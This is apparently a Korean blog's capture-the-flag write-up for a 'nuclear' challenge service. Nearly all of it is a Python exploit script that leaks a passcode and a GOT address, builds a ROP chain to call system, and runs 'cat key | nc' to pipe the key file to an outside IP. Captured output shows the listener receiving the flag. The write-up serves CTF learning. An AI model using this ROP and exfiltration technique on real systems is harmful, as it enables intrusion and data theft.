고정 헤더 영역
상세 컨텐츠
본문
반응형
nuclear_d4f699f3dbb8aadf7c224aa57f57eb4c
from socket import *
from struct import *
import time
p = lambda x : pack(" up = lambda x : unpack(" ip = "192.168.0.109" ip = "58.229.183.22" port = 1129 s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) launchcode = "in the end, i was there." # this is passkey send_plt = 0x08048900 recv_plt = 0x080488e0 send_wrap = 0x08048a0d recv_wrap = 0x08048a6f mprotect_got = 0xb75f22b0 freespace = 0x0804b500 ppppr = 0x0804917c pppr = ppppr 1 ppr = pppr 1 pr = ppr 1 r = pr 1 def leak_payload1(): payload = "" payload = "1" * 500 payload = "/" payload = "1" * 1000 return payload def leak_payload2(): payload = "" payload = "1." payload = "1" * 500 payload = "/" payload = "1" * 1000 return payload def leak_setsock_got(): payload ="" payload = "A" * 0x20c payload = "BBBB" payload = p(send_wrap) payload = p(ppr) payload = p(4) payload = p(0x0804b00c) payload = p(0x08048b5b) payload = p(pr) payload = p(4) payload = p(0x08048b5b) payload = p(pr) payload = p(4) payload = p(0x08048b5b) payload = p(pr) payload = p(4) payload = p(0x08048b5b) return payload def mpro_exploit(mprotect): # mprotect payload payload ="" payload = "A" * 0x20c payload = "BBBB" payload = p(mprotect) payload = p(pppr) payload = p(freespace) payload = p(3000) payload = p(7) payload = p(recv_wrap) payload = p(pr) payload = p(4) payload = p(freespace) payload = p(len(shellcode)) return payload def sys_exploit(system): payload ="" payload = "A" * 0x20c payload = "BBBB" payload = p(recv_wrap) payload = p(pppr) payload = p(4) payload = p(freespace) payload = p(len("cat key | nc 220.117.247.200 12071\x00")) payload = p(system) payload = p(pr) payload = p(freespace) payload = p(0x08048b5b) return payload #########################[START EXPLOIT]############################## print s.recv(1024) print s.recv(1024) s.send("target\n") print s.recv(1024) s.send(leak_payload1() "\n") # try to leak ##################[End LEAK FILE NAME - 1]############################ print s.recv(4096) print s.recv(4096) s.send("target\n") print s.recv(4096) s.send(leak_payload2() "\n") # try to leak File name ##################[End LEAK FILE NAME - 2]############################ print s.recv(4096) launchcode = s.recv(4096).split('\n')[0] launchcode = launchcode[len(launchcode)-24:] # get launchcode launchcode = "\n" print "LEAKED NUCLEAR LAUNCH CODE IS : " launchcode ##################[End LEAK FILE NAME - 3]############################ s.send("launch") print s.recv(4096) s.send(launchcode) print s.recv(1024) s.send(leak_setsock_got()) print s.recv(1024) time.sleep(1) setsockopt = up(s.recv(1024)[0:4]) print hex(setsockopt) print s.recv(1024) ##################[ End LEAK SETSOCK 'GOT' ]########################## mprotect = setsockopt - 0x6810 system = setsockopt - 0xb2860 print hex(system) #######################[ GOT SYSTEM PTR ]############################# s.send(sys_exploit(system)) time.sleep(0.3) s.send("cat key | nc 220.117.247.200 12071\x00") time.sleep(0.3) ############################[ GET KEY ]############################### s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) ##########################[ End Of File ]############################# """ "in the end, i was there." # this is passkey ###################################################################### :: Welcome to the Nuclear Control System :: > [ ] Enter coordinate of target, (Latitude/Longitude) ---> [ ] Target coordinate setting completed. > [!] Unknown command : 11111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111넁%P > [!] Unknown command : 11111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 111111111111111111111 > [ ] Enter coordinate of target, (Latitude/Longitude) ---> [ ] Target coordinate setting completed. LEAKED NUCLEAR LAUNCH CODE IS : in the end, i was there. [ ] Enter the passcode to launch the nuclear : [ ] Correct passcode! [2J[0;0H[5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE COUNT DOWN : 100 0xb76a8ac0L [5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE COUNT DOWN : 99 0xb75f6260L C:\Users\Administrator> C:\Users\Administrator>nc -lvp 12071 listening on [any] 12071 ... 58.229.183.22: inverse host lookup failed: h_errno 11004: NO_DATA connect to [192.168.0.93] from (UNKNOWN) [58.229.183.22] 45227: NO_DATA BUG_BOUNTIES_b3COM3_GrEAT """ # Key : BUG_BOUNTIES_b3COM3_GrEAT ##############################[ Result ]##############################
Key : BUG_BOUNTIES_b3COM3_GrEAT
처음에 mprotect로 시도하는데 잘 안되서 system으로 전환했더니 잘 된다.
이럴수가! [근데 cd80의 풀이를 보니 mprotect도 잘된는것 같았다... -_-]
반응형
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| CodeGate 2014 PreQual Angry Doraemon (3) | 2014.02.25 |
|---|---|
| CodaGate 2014 PreQual WebProxy write-up (0) | 2014.02.25 |
| 2014 CodeGate Junior PreQual - Closure, RunCommand (5) | 2014.02.16 |
| CodeGate 2013 Vulnerability 400 Exploit (0) | 2014.02.15 |
| 2013 ETRI junior ctf level10 write up (0) | 2014.02.06 |
